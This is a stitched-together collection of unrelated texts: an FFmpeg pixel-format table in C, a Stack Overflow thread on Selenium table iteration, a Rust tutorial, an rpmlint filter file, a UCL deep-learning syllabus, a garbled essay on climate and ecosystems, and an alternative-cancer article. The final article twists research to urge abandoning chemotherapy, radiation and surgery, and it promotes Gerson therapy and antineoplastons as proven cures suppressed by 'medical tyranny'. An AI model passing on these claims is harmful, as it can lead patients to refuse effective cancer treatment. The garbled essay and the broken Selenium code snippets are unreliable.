}, [PIX_FMT_RGB8] = { .name = "rgb8", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,6,1}, /* R */ {0,0,1,3,2}, /* G */ {0,0,1,0,2}, /* B */ }, .flags = PIX_FMT_PAL, }, [PIX_FMT_RGB4] = { .name = "rgb4", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,3,1,0,0}, /* R */ {0,3,2,0,1}, /* G */ {0,3,4,0,0}, /* B */ }, .flags = PIX_FMT_BITSTREAM, }, [PIX_FMT_RGB4_BYTE] = { .name = "rgb4_byte", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,3,0}, /* R */ {0,0,1,1,1}, /* G */ {0,0,1,0,0}, /* B */ }, .flags = PIX_FMT_PAL, }, [PIX_FMT_NV12] = { .name = "nv12", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 1, .comp = { {0,0,1,0,7}, /* Y */ {1,1,1,0,7}, /* U */ {1,1,2,0,7}, /* V */ }, }, [PIX_FMT_NV21] = { .name = "nv21", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 1, .comp = { {0,0,1,0,7}, /* Y */ {1,1,1,0,7}, /* V */ {1,1,2,0,7}, /* U */ }, }, [PIX_FMT_ARGB] = { .name = "argb", .nb_channels = 4, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,3,1,0,7}, /* A */ {0,3,2,0,7}, /* R */ {0,3,3,0,7}, /* G */ {0,3,4,0,7}, /* B */ }, }, [PIX_FMT_RGBA] = { .name = "rgba", .nb_channels = 4, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,3,1,0,7}, /* R */ {0,3,2,0,7}, /* G */ {0,3,3,0,7}, /* B */ {0,3,4,0,7}, /* A */ }, }, [PIX_FMT_ABGR] = { .name = "abgr", .nb_channels = 4, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,3,1,0,7}, /* A */ {0,3,2,0,7}, /* B */ {0,3,3,0,7}, /* G */ {0,3,4,0,7}, /* R */ }, }, [PIX_FMT_BGRA] = { .name = "bgra", .nb_channels = 4, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,3,1,0,7}, /* B */ {0,3,2,0,7}, /* G */ {0,3,3,0,7}, /* R */ {0,3,4,0,7}, /* A */ }, }, [PIX_FMT_GRAY16BE] = { .name = "gray16be", .nb_channels = 1, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,1,0,15}, /* Y */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_GRAY16LE] = { .name = "gray16le", .nb_channels = 1, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,1,0,15}, /* Y */ }, }, [PIX_FMT_YUV440P] = { .name = "yuv440p", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 1, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUVJ440P] = { .name = "yuvj440p", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 1, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUVA420P] = { .name = "yuva420p", .nb_channels = 4, .log2_chroma_w= 1, .log2_chroma_h= 1, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ {3,0,1,0,7}, /* A */ }, }, [PIX_FMT_VDPAU_H264] = { .name = "vdpau_h264", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_VDPAU_MPEG1] = { .name = "vdpau_mpeg1", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_VDPAU_MPEG2] = { .name = "vdpau_mpeg2", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_VDPAU_WMV3] = { .name = "vdpau_wmv3", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_VDPAU_VC1] = { .name = "vdpau_vc1", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_VDPAU_MPEG4] = { .name = "vdpau_mpeg4", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_RGB48BE] = { .name = "rgb48be", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,5,1,0,15}, /* R */ {0,5,3,0,15}, /* G */ {0,5,5,0,15}, /* B */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_RGB48LE] = { .name = "rgb48le", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,5,1,0,15}, /* R */ {0,5,3,0,15}, /* G */ {0,5,5,0,15}, /* B */ }, }, [PIX_FMT_RGB565BE] = { .name = "rgb565be", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,0,3,4}, /* R */ {0,1,1,5,5}, /* G */ {0,1,1,0,4}, /* B */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_RGB565LE] = { .name = "rgb565le", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,2,3,4}, /* R */ {0,1,1,5,5}, /* G */ {0,1,1,0,4}, /* B */ }, }, [PIX_FMT_RGB555BE] = { .name = "rgb555be", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,0,2,4}, /* R */ {0,1,1,5,4}, /* G */ {0,1,1,0,4}, /* B */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_RGB555LE] = { .name = "rgb555le", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,2,2,4}, /* R */ {0,1,1,5,4}, /* G */ {0,1,1,0,4}, /* B */ }, }, [PIX_FMT_BGR565BE] = { .name = "bgr565be", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,0,3,4}, /* B */ {0,1,1,5,5}, /* G */ {0,1,1,0,4}, /* R */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_BGR565LE] = { .name = "bgr565le", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,2,3,4}, /* B */ {0,1,1,5,5}, /* G */ {0,1,1,0,4}, /* R */ }, }, [PIX_FMT_BGR555BE] = { .name = "bgr555be", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,0,2,4}, /* B */ {0,1,1,5,4}, /* G */ {0,1,1,0,4}, /* R */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_BGR555LE] = { .name = "bgr555le", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,2,2,4}, /* B */ {0,1,1,5,4}, /* G */ {0,1,1,0,4}, /* R */ }, }, [PIX_FMT_VAAPI_MOCO] = { .name = "vaapi_moco", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_VAAPI_IDCT] = { .name = "vaapi_idct", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_VAAPI_VLD] = { .name = "vaapi_vld", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_YUV420P16LE] = { .name = "yuv420p16le", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 1, .comp = { {0,1,1,0,15}, /* Y */ {1,1,1,0,15}, /* U */ {2,1,1,0,15}, /* V */ }, }, [PIX_FMT_YUV420P16BE] = { .name = "yuv420p16be", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 1, .comp = { {0,1,1,0,15}, /* Y */ {1,1,1,0,15}, /* U */ {2,1,1,0,15}, /* V */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_YUV422P16LE] = { .name = "yuv422p16le", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 0, .comp = { {0,1,1,0,15}, /* Y */ {1,1,1,0,15}, /* U */ {2,1,1,0,15}, /* V */ }, }, [PIX_FMT_YUV422P16BE] = { .name = "yuv422p16be", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 0, .comp = { {0,1,1,0,15}, /* Y */ {1,1,1,0,15}, /* U */ {2,1,1,0,15}, /* V */ }, .flags = PIX_FMT_BE, }, [PIX_FMT_YUV444P16LE] = { .name = "yuv444p16le", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,1,0,15}, /* Y */ {1,1,1,0,15}, /* U */ {2,1,1,0,15}, /* V */ }, }, [PIX_FMT_YUV444P16BE] = { .name = "yuv444p16be", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,1,1,0,15}, /* Y */ {1,1,1,0,15}, /* U */ {2,1,1,0,15}, /* V */ }, .flags = PIX_FMT_BE, }, }; int av_get_bits_per_pixel(const AVPixFmtDescriptor *pixdesc) { int c, bits = 0; int log2_pixels = pixdesc->log2_chroma_w + pixdesc->log2_chroma_h; for (c = 0; c < pixdesc->nb_channels; c++) { int s = c==1 || c==2 ? 0 : log2_pixels; bits += (pixdesc->comp[c].depth_minus1+1) << s; } return bits >> log2_pixels; }
__label__pos
1
Take the tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. I have a table called UserManagement that contains information about the user.This table gets updated whenever new user is created. If i create two users then i need check whether two users are actually created or not. Table contains ID,UserName,FirstName,LastName,Bdate..ctc. Here ID will be generated automatically. I am running Selenium-TestNG script.Using Selenium,how can i get the UserName of the two users which i have created? Should i have to iterate through table? If so how to iterate through the table? share|improve this question add comment 3 Answers Use ISelenium.GetTable(string) to get the contents of the table cells you want. For example, selenium.GetTable("UserManagement.0.1"); will return the contents of the table's first row and second column. You could then assert that the correct username or usernames appear in the table. share|improve this answer   I tried the same using it in a loop as selenium.GetTable("UserManagement.i.1") where I want to iterate through loop but it wont work..instead selenium.GetTable("UserManagement.0.1") it works..ANy idea why –  sam Jan 16 '11 at 15:30   @sam what values of i are you iterating over? –  Wesley Wiser Jan 16 '11 at 18:50   following is what I am trying to do i is a counter to numof rows. For i As Integer = 1 To NumOfRows Dim strTableColumn As String = selenium.GetTable("Group.i.1") If (strTableColumn = pword) Then ReturnValue = i IsFound = True Exit For End If Next –  sam Jan 17 '11 at 8:16   @sam looks like you have 2 issues: you're starting at 1 instead of 0 and you need to use string concatenation to build the locator "Group." + i + ".1" instead of "Group.i.1" –  Wesley Wiser Jan 18 '11 at 4:35 add comment Get the count of rows using Selenium.getxpathcount(\@id = fjsfj\td\tr") in a variable rowcount Give the columncount in a variable Ex: int colcount = 5; Give the req i.e New user String user1 = "ABC" for(i = 0;i <=rowcount;i++) { for(j=0;j<=colcount;j++) { if (user1==selenium.gettable("//@[id=dldl/tbody" +i "td"+j)) { system.out.println(user1 + "Inserted"); break; } break; } } share|improve this answer   I tried with the same solution you provide. But xpath is not taking i(counter) instead if you use a static row no it works. Any other possible solution –  sam Jan 16 '11 at 15:28 add comment Get the number of rows using: int noOfRowsInTable = selenium.getXpathCount("//table[@id='TableId']//tr"); If the UserName you want to get is at fixed position, let's say at 2nd position, then for each row iterate as given below: selenium.getText("xpath=//table[@id='TableId']//tr//td[1]"); Note: we can find the number of columns in that table using same procedure int noOfColumnsInTable = selenium.getXpathCount("//table[@id='TableId']//tr//td"); share|improve this answer add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.829538
Share this page Learn X in Y minutes Where X=Rust Rust is a programming language developed by Mozilla Research. Rust combines low-level control over performance with high-level convenience and safety guarantees. It achieves these goals without requiring a garbage collector or runtime, making it possible to use Rust libraries as a “drop-in replacement” for C. Rust’s first release, 0.1, occurred in January 2012, and for 3 years development moved so quickly that until recently the use of stable releases was discouraged and instead the general advice was to use nightly builds. On May 15th 2015, Rust 1.0 was released with a complete guarantee of backward compatibility. Improvements to compile times and other aspects of the compiler are currently available in the nightly builds. Rust has adopted a train-based release model with regular releases every six weeks. Rust 1.1 beta was made available at the same time of the release of Rust 1.0. Although Rust is a relatively low-level language, it has some functional concepts that are generally found in higher-level languages. This makes Rust not only fast, but also easy and efficient to code in. // This is a comment. Line comments look like this... // and extend multiple lines like this. /// Documentation comments look like this and support markdown notation. /// # Examples /// /// ``` /// let five = 5 /// ``` /////////////// // 1. Basics // /////////////// #[allow(dead_code)] // Functions // `i32` is the type for 32-bit signed integers fn add2(x: i32, y: i32) -> i32 { // Implicit return (no semicolon) x + y } #[allow(unused_variables)] #[allow(unused_assignments)] #[allow(dead_code)] // Main function fn main() { // Numbers // // Immutable bindings let x: i32 = 1; // Integer/float suffixes let y: i32 = 13i32; let f: f64 = 1.3f64; // Type inference // Most of the time, the Rust compiler can infer what type a variable is, so // you don’t have to write an explicit type annotation. // Throughout this tutorial, types are explicitly annotated in many places, // but only for demonstrative purposes. Type inference can handle this for // you most of the time. let implicit_x = 1; let implicit_f = 1.3; // Arithmetic let sum = x + y + 13; // Mutable variable let mut mutable = 1; mutable = 4; mutable += 2; // Strings // // String literals let x: &str = "hello world!"; // Printing println!("{} {}", f, x); // 1.3 hello world // A `String` – a heap-allocated string let s: String = "hello world".to_string(); // A string slice – an immutable view into another string // The string buffer can be statically allocated like in a string literal // or contained in another object (in this case, `s`) let s_slice: &str = &s; println!("{} {}", s, s_slice); // hello world hello world // Vectors/arrays // // A fixed-size array let four_ints: [i32; 4] = [1, 2, 3, 4]; // A dynamic array (vector) let mut vector: Vec<i32> = vec![1, 2, 3, 4]; vector.push(5); // A slice – an immutable view into a vector or array // This is much like a string slice, but for vectors let slice: &[i32] = &vector; // Use `{:?}` to print something debug-style println!("{:?} {:?}", vector, slice); // [1, 2, 3, 4, 5] [1, 2, 3, 4, 5] // Tuples // // A tuple is a fixed-size set of values of possibly different types let x: (i32, &str, f64) = (1, "hello", 3.4); // Destructuring `let` let (a, b, c) = x; println!("{} {} {}", a, b, c); // 1 hello 3.4 // Indexing println!("{}", x.1); // hello ////////////// // 2. Types // ////////////// // Struct struct Point { x: i32, y: i32, } let origin: Point = Point { x: 0, y: 0 }; // A struct with unnamed fields, called a ‘tuple struct’ struct Point2(i32, i32); let origin2 = Point2(0, 0); // Basic C-like enum enum Direction { Left, Right, Up, Down, } let up = Direction::Up; // Enum with fields enum OptionalI32 { AnI32(i32), Nothing, } let two: OptionalI32 = OptionalI32::AnI32(2); let nothing = OptionalI32::Nothing; // Generics // struct Foo<T> { bar: T } // This is defined in the standard library as `Option` enum Optional<T> { SomeVal(T), NoVal, } // Methods // impl<T> Foo<T> { // Methods take an explicit `self` parameter fn bar(&self) -> &T { // self is borrowed &self.bar } fn bar_mut(&mut self) -> &mut T { // self is mutably borrowed &mut self.bar } fn into_bar(self) -> T { // here self is consumed self.bar } } let a_foo = Foo { bar: 1 }; println!("{}", a_foo.bar()); // 1 // Traits (known as interfaces or typeclasses in other languages) // trait Frobnicate<T> { fn frobnicate(self) -> Option<T>; } impl<T> Frobnicate<T> for Foo<T> { fn frobnicate(self) -> Option<T> { Some(self.bar) } } let another_foo = Foo { bar: 1 }; println!("{:?}", another_foo.frobnicate()); // Some(1) ///////////////////////// // 3. Pattern matching // ///////////////////////// let foo = OptionalI32::AnI32(1); match foo { OptionalI32::AnI32(n) => println!("it’s an i32: {}", n), OptionalI32::Nothing => println!("it’s nothing!"), } // Advanced pattern matching struct FooBar { x: i32, y: OptionalI32 } let bar = FooBar { x: 15, y: OptionalI32::AnI32(32) }; match bar { FooBar { x: 0, y: OptionalI32::AnI32(0) } => println!("The numbers are zero!"), FooBar { x: n, y: OptionalI32::AnI32(m) } if n == m => println!("The numbers are the same"), FooBar { x: n, y: OptionalI32::AnI32(m) } => println!("Different numbers: {} {}", n, m), FooBar { x: _, y: OptionalI32::Nothing } => println!("The second number is Nothing!"), } ///////////////////// // 4. Control flow // ///////////////////// // `for` loops/iteration let array = [1, 2, 3]; for i in array.iter() { println!("{}", i); } // Ranges for i in 0u32..10 { print!("{} ", i); } println!(""); // prints `0 1 2 3 4 5 6 7 8 9 ` // `if` if 1 == 1 { println!("Maths is working!"); } else { println!("Oh no..."); } // `if` as expression let value = if true { "good" } else { "bad" }; // `while` loop while 1 == 1 { println!("The universe is operating normally."); // break statement gets out of the while loop. // It avoids useless iterations. break } // Infinite loop loop { println!("Hello!"); // break statement gets out of the loop break } ///////////////////////////////// // 5. Memory safety & pointers // ///////////////////////////////// // Owned pointer – only one thing can ‘own’ this pointer at a time // This means that when the `Box` leaves its scope, it can be automatically deallocated safely. let mut mine: Box<i32> = Box::new(3); *mine = 5; // dereference // Here, `now_its_mine` takes ownership of `mine`. In other words, `mine` is moved. let mut now_its_mine = mine; *now_its_mine += 2; println!("{}", now_its_mine); // 7 // println!("{}", mine); // this would not compile because `now_its_mine` now owns the pointer // Reference – an immutable pointer that refers to other data // When a reference is taken to a value, we say that the value has been ‘borrowed’. // While a value is borrowed immutably, it cannot be mutated or moved. // A borrow is active until the last use of the borrowing variable. let mut var = 4; var = 3; let ref_var: &i32 = &var; println!("{}", var); // Unlike `mine`, `var` can still be used println!("{}", *ref_var); // var = 5; // this would not compile because `var` is borrowed // *ref_var = 6; // this would not either, because `ref_var` is an immutable reference ref_var; // no-op, but counts as a use and keeps the borrow active var = 2; // ref_var is no longer used after the line above, so the borrow has ended // Mutable reference // While a value is mutably borrowed, it cannot be accessed at all. let mut var2 = 4; let ref_var2: &mut i32 = &mut var2; *ref_var2 += 2; // '*' is used to point to the mutably borrowed var2 println!("{}", *ref_var2); // 6 , // var2 would not compile. // ref_var2 is of type &mut i32, so stores a reference to an i32, not the value. // var2 = 2; // this would not compile because `var2` is borrowed. ref_var2; // no-op, but counts as a use and keeps the borrow active until here } Further reading There’s a lot more to Rust—this is just the basics of Rust so you can understand the most important things. To learn more about Rust, read The Rust Programming Language and check out the /r/rust subreddit. The folks on the #rust channel on irc.mozilla.org are also always keen to help newcomers. You can also try out features of Rust with an online compiler at the official Rust playpen or on the main Rust website. Got a suggestion? A correction, perhaps? Open an Issue on the Github Repo, or make a pull request yourself! Originally contributed by P1start, and updated by 13 contributor(s).
__label__pos
0.994989
You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long. python3.11/rpmlint.toml 107 lines 4.4 KiB TOML Filters = [ # KNOWN BUGS: # https://bugzilla.redhat.com/show_bug.cgi?id=1489816 'crypto-policy-non-compliance-openssl', # TESTS: '(zero-length|pem-certificate|uncompressed-zip) /usr/lib(64)?/python3\.\d+/test', # OTHER DELIBERATES: # chroot function 'missing-call-to-chdir-with-chroot', # gethostbyname function calls gethostbyname '(E|W): binary-or-shlib-calls-gethostbyname /usr/lib(64)?/python3\.\d+/lib-dynload/_socket\.', # intentionally unversioned and selfobsoleted 'unversioned-explicit-obsoletes python', 'unversioned Obsoletes: Obsoletes: python3\.\d+$', 'self-obsoletion python3\.\d+(-\S+)? obsoletes python3\.\d+(-\S+)?', # intentionally hardcoded 'hardcoded-library-path in %{_prefix}/lib/(debug/%{_libdir}|python%{pybasever})', # we have non binary stuff, python files 'only-non-binary-in-usr-lib', # some devel files that are deliberately needed 'devel-file-in-non-devel-package /usr/include/python3\.\d+m?/pyconfig-(32|64)\.h', 'devel-file-in-non-devel-package /usr/lib(64)?/python3\.\d+/distutils/tests/xxmodule\.c', # ...or are used as test data 'devel-file-in-non-devel-package /usr/lib(64)?/python3\.\d+/test', # some bytecode is shipped without sources on purpose, as a space optimization # if this regex needs to be relaxed in the future, make sure it **does not** match pyc files in __pycache__ 'python-bytecode-without-source /usr/lib(64)?/python3\.\d+/(encodings|pydoc_data)/[^/]+.pyc', # DUPLICATE FILES # test data are often duplicated '(E|W): files-duplicate /usr/lib(64)?/python3\.\d+/(test|__phello__)/', # duplicated inits or mains are also common '(E|W): files-duplicate .+__init__\.py.+__init__\.py', '(E|W): files-duplicate .+__main__\.py.+__main__\.py', # files in the debugsource package '(E|W): files-duplicate /usr/src/debug', # general waste report '(E|W): files-duplicated-waste', # SORRY, NOT SORRY: # manual pages 'no-manual-page-for-binary (idle|pydoc|pyvenv|2to3|python3?-debug|pathfix|msgfmt|pygettext)', 'no-manual-page-for-binary python3?.*-config$', 'no-manual-page-for-binary python3\.\d+dm?$', # missing documentation from subpackages '^python3(\.\d+)?-(debug|tkinter|test|idle)\.[^:]+: (E|W): no-documentation', # platform python is obsoleted, but not provided 'obsolete-not-provided platform-python', # we have extra tokens at the end of %endif/%else directives, we consider them useful 'extra tokens at the end of %(endif|else) directive', # RPMLINT IMPERFECTIONS # https://github.com/rpm-software-management/rpmlint/issues/780 '/usr/lib/debug', # we provide python(abi) manually to be sure. createrepo will merge this with the automatic 'python3(\.\d+)?\.[^:-]+: (E|W): useless-provides python\(abi\)', # debugsource and debuginfo have no docs '^python3(\.\d+)?-debug(source|info)\.[^:]+: (E|W): no-documentation', # this is OK for F28+ 'library-without-ldconfig-post', # debug package contains devel and non-devel files 'python3(\.\d+)?-debug\.[^:]+: (E|W): (non-)?devel-file-in-(non-)?devel-package', # this goes to other subpackage, hence not actually dangling 'dangling-relative-symlink /usr/bin/python python3', 'dangling-relative-symlink /usr/share/man/man1/python\.1\.gz python3\.1\.gz', 'dangling-relative-symlink /usr/lib(64)?/pkgconfig/python-3\.\d+dm?(-embed)?\.pc python-3\.\d+(-embed)?\.pc', # the python-unversioned-command package contains dangling symlinks by design '^python-unversioned-command\.[^:]+: (E|W): dangling-relative-symlink (/usr/bin/python \./python3|/usr/share/man/man1/python\.1\S* ./python3\.1\S*)$', # we need this macro to evaluate, even if the line starts with # 'macro-in-comment %\{_pyconfig(32|64)_h\}', # Python modules don't need to be linked against libc # Since 3.8 they are no longer linked against libpython3.8.so.1.0 '(E|W): library-not-linked-against-libc /usr/lib(64)?/python3\.\d+/lib-dynload/', '(E|W): shared-lib(rary)?-without-dependency-information /usr/lib(64)?/python3\.\d+/lib-dynload/', # specfile-errors are listed twice, once with reason and once without # we filter out the empty ones '\bpython3(\.\d+)?\.(src|spec): (E|W): specfile-error\s+$', # SPELLING ERRORS 'spelling-error .* en_US (bytecode|pyc|filename|tkinter|namespaces|pytest) ', ]
__label__pos
0.921809
COMPGI22 - Advanced Deep Learning and Reinforcement Learning This database contains the 2017-18 versions of syllabuses. Syllabuses from the 2016-17 session are available here. Note: Whilst every effort is made to keep the syllabus and assessment records correct, the precise details must be checked with the lecturer(s). CodeCOMPGI22 (Also taught as COMPMI22) YearMSc Prerequisites The prerequisites are probability, calculus, linear algebra AND COMPGI01 Supervised Learning OR COMPGI08 Graphical Models OR COMPGI18 Probabilistic and Unsupervised Learning. In order to successfully complete the coursework for this module, students will require excellent coding skills in Python. Term2 Taught By Thore Graepel (50%) Hado van Hasselt (50%) The course is taught in collaboration with DeepMind. The majority of lectures will be taught by guest lecturers from DeepMind who are leading experts in the field of machine learning and will teach about topics in which they are specialised. AimsStudents successfully completing the module should understand: 1. The basics of deep learning and reinforcement learning paradigms 2. Architectures and optimization methods for deep neural network training 3. How to implement deep learning methods within TensorFlow and apply them to data 4. The theoretical foundations and algorithms of reinforcement learning 5. How to apply reinforcement learning algorithms to environments with complex dynamics Learning Outcomes To understand the foundations of deep learning, reinforcement learning, and deep reinforcement learning including the ability to successfully implement, apply and test relevant learning algorithms in TensorFlow. Content The course has two interleaved parts that converge towards the end of the course. One part is on machine learning with deep neural networks, the other part is about prediction and control using reinforcement learning. The two strands come together when we discuss deep reinforcement learning, where deep neural networks are trained as function approximators in a reinforcement learning setting. The deep learning stream of the course will cover a short introduction to neural networks and supervised learning with TensorFlow, followed by lectures on convolutional neural networks, recurrent neural networks, end-to-end and energy-based learning, optimization methods, unsupervised learning as well as attention and memory. Possible applications areas to be discussed include object recognition and natural language processing. The reinforcement learning stream will cover Markov decision processes, planning by dynamic programming, model-free prediction and control, value function approximation, policy gradient methods, integration of learning and planning, and the exploration/exploitation dilemma. Possible applications to be discussed include learning to play classic board games as well as video games. Method of Instruction Lectures, reading, and course work assignments. Course work will focus on the practical implementation of deep neural network training and reinforcement learning algorithms and architectures in Tensorflow. Assessment The course has the following assessment components: • Coursework (100%) • Deep learning Programming and experimentation in Python/TensorFlow • Reinforcement Learning Programming and experimentation in Python/TensorFlow   To pass this course, students must: • Obtain an overall pass mark of 50% for all sections combined. • Obtain at least 50% in both Deep Learning and Reinforcement Learning. Resources Reading list available via the UCL Library catalogue.
__label__pos
0.824873
The Effects of Climate Change on the Human Environment Environment refers to the entire planet in space and time. The environment is the “average” condition of a planet in its current state of development or in relation to the information and scientific knowledge it has at the present time. It is usually used in reference to science fiction novels where the future world is described and sometimes deliberately left ambiguous to invoke fear and mystery. It can also be used in everyday life, though not always intentionally to evoke such an effect. It can refer to how the world works in general, including the processes by which people interact with one another, the physical environment one lives in, the cultural and socio-linguistic features of that culture and the political environment one sees. The entire natural environment or the earth’s environment encompasses all living and non-life objects existing simultaneously, which means in this instance not man made. The word is most commonly used in reference to the Earth or its parts in geology, astronomy, topography, and biology. However, the term encompasses all aspects of the earth’s environment. These include humans, their interaction with one another, the physical processes by which they survive and thrive, the climate by which they live (including temperature, precipitation, wind, clouds, rainfall, land elevation and soil fertility), and the biological diversity of the entire living world. A large portion of the earth’s environment is made of living organisms. These living organisms (which we call “organisms”) have developed through a process called natural selection. Natural Selection is the gradual evolution over time of traits ( adaptations ) that serve an organism’s fitness in a specific environment. adaptation is the resulting change in the traits (a change from one state to another) that serve an organism’s fitness in its current environment. Therefore, all land animals and plants are considered adapted to their current environment if and when changes in the environment enable those organisms to adapt by changing their traits to match that environment. But, the environment is constantly changing. It is very difficult to keep track of all the changes that take place within the living Earth environment. Furthermore, most Earth systems are extremely complex and unbalanced. This is further compounded by the fact that most Earth systems are connected in networks and a super-network of interacting environments known as ecop ecosystems. Ecop ecosystems are highly delicate and there is a great deal of interdependence among them. Therefore, a great deal of energy, water, heat, chemicals, light, and other forms of vital life-sustaining energy and materials are required to maintain the existing and ongoing balance of ecosystems and their environments. Additionally, without these ecop ecosystems or constructed environments human civilizations would quickly become unsustainable. One of the most serious consequences of climate change is the possibility of drought, which has the potential to completely destroy human civilizations, possibly leading to wars and deaths of millions. One of the reasons for the potentially disastrous impact of climate change is the rapid rate at which the Earth’s environment is being destroyed. The destruction of the Earth’s ecosystems and built environments by human beings is directly proportional to the accumulation of carbon dioxide and other greenhouse gases in the Earth’s atmosphere. Therefore, by understanding how the Earth’s ecosystems interact and work, it becomes possible to save the ecosystems from collapse. A better understanding of the interdependence and feedback mechanisms among Earth’s ecosystems can help us design better strategies for avoiding the catastrophic devastation of Earth’s ecosystems and built environments. A better appreciation of the importance of natural environments will provide a greater number of solutions to global warming than have been available up until now.
__label__pos
0.989287
Three recent studies published in the journals Nature and Science shed new light on why chemotherapy, a common conventional treatment for cancer, is typically a complete failure at permanently eradicating cancer.  Based on numerous assessments of how cancer cells multiply and spread, researchers from numerous countries have confirmed that cancer tumors generate their own stem cells, which in turn feed the re-growth of new tumors after earlier ones have been eliminated.   What The Studies Demonstrated In one of the studies published in the journal Nature, researcher Luis Parada from the University of Texas Southwestern Medical Center in Dallas and his colleagues decided to investigate how new tumors are able to re-grow after previous ones have been wiped out with chemotherapy. To do this, Parada and his team identified and genetically labeled cancer cells in brain tumors of mice before proceeding to treat the tumors with conventional chemotherapy. What they discovered was that, although chemotherapy appeared in many cases to successfully kill tumor cells and temporarily stop the growth and spread of cancer, the treatment ultimately failed to prevent new tumors from forming. And the culprit, it turns out, was cancer stem cells that persisted long after chemotherapy, which quietly prompted the re-growth of new tumors later down the road. A second study published in Nature found similar results using skin tumors, while a third published in the journal Science confirmed both of the other studies in research involving intestinal polyps. It appears as though, all across the board, cancer tumors possess an inherent ability to produce their own stem cells, which can circulate throughout the body and develop into tumors. And traditional cancer treatments do nothing to address them. Forward-thinking Cancer Experts Suggest Abandoning Chemotherapy, Radiation, and Surgery To Treat Cancer Researchers at the University of Michigan's Comprehensive Cancer Center seem to agree with these conclusions as well, and are now suggesting, along with many others, a completely new approach to cancer treatment. Progressive cancer researchers believe it is now time to move forward with investigating new treatment approaches. "Traditional therapies like surgery, chemotherapy, and radiation do not destroy the small number of cells driving the cancer's growth," says UM's Comprehensive Cancer Center. "Instead of trying to kill all the cells in a tumor with chemotherapy or radiation, we believe it would be more effective to use treatments targeted directly at these so-called cancer stem cells. If the stem cells were eliminated, the cancer would be unable to grow and spread to other locations in the body." Alternative cancer therapies like the Gerson therapy (www.gerson.org) and Dr. Stanislaw Burzynski's antineoplastons (www.burzynskiclinic.com), for instance, are already successfully treating cancers in this way.  But because of censorship issues and medical tyranny, these treatments are still not widely accepted, and are actually considered to be fraudulent by the U.S. Food and Drug Administration (FDA) and virtually all state and federal medical boards in the US.   The Top Cancer Fighting Foods 1. Carrots Carrots are rich in beta-carotene, a super strong antioxidant that helps keep stomach, prostate and lung cancer away.  2. Cabbage and Broccoli Cabbages contain cancer-fighting indole-3-carbinol, which are said to help ward off cancer. Broccoli is a well-known cancer busting vegetable as its glucoraphanin enzyme protects the body from rectum and colon cancer. 3. Tomato Containing a rich source of antioxidant lycopene, they protect the body from various cancer cells, plus it's also packed with vitamin C, which helps strengthen the body's immune system. 4. Garlic Garlic isn't just a great way to flavor our food, but it's a clever 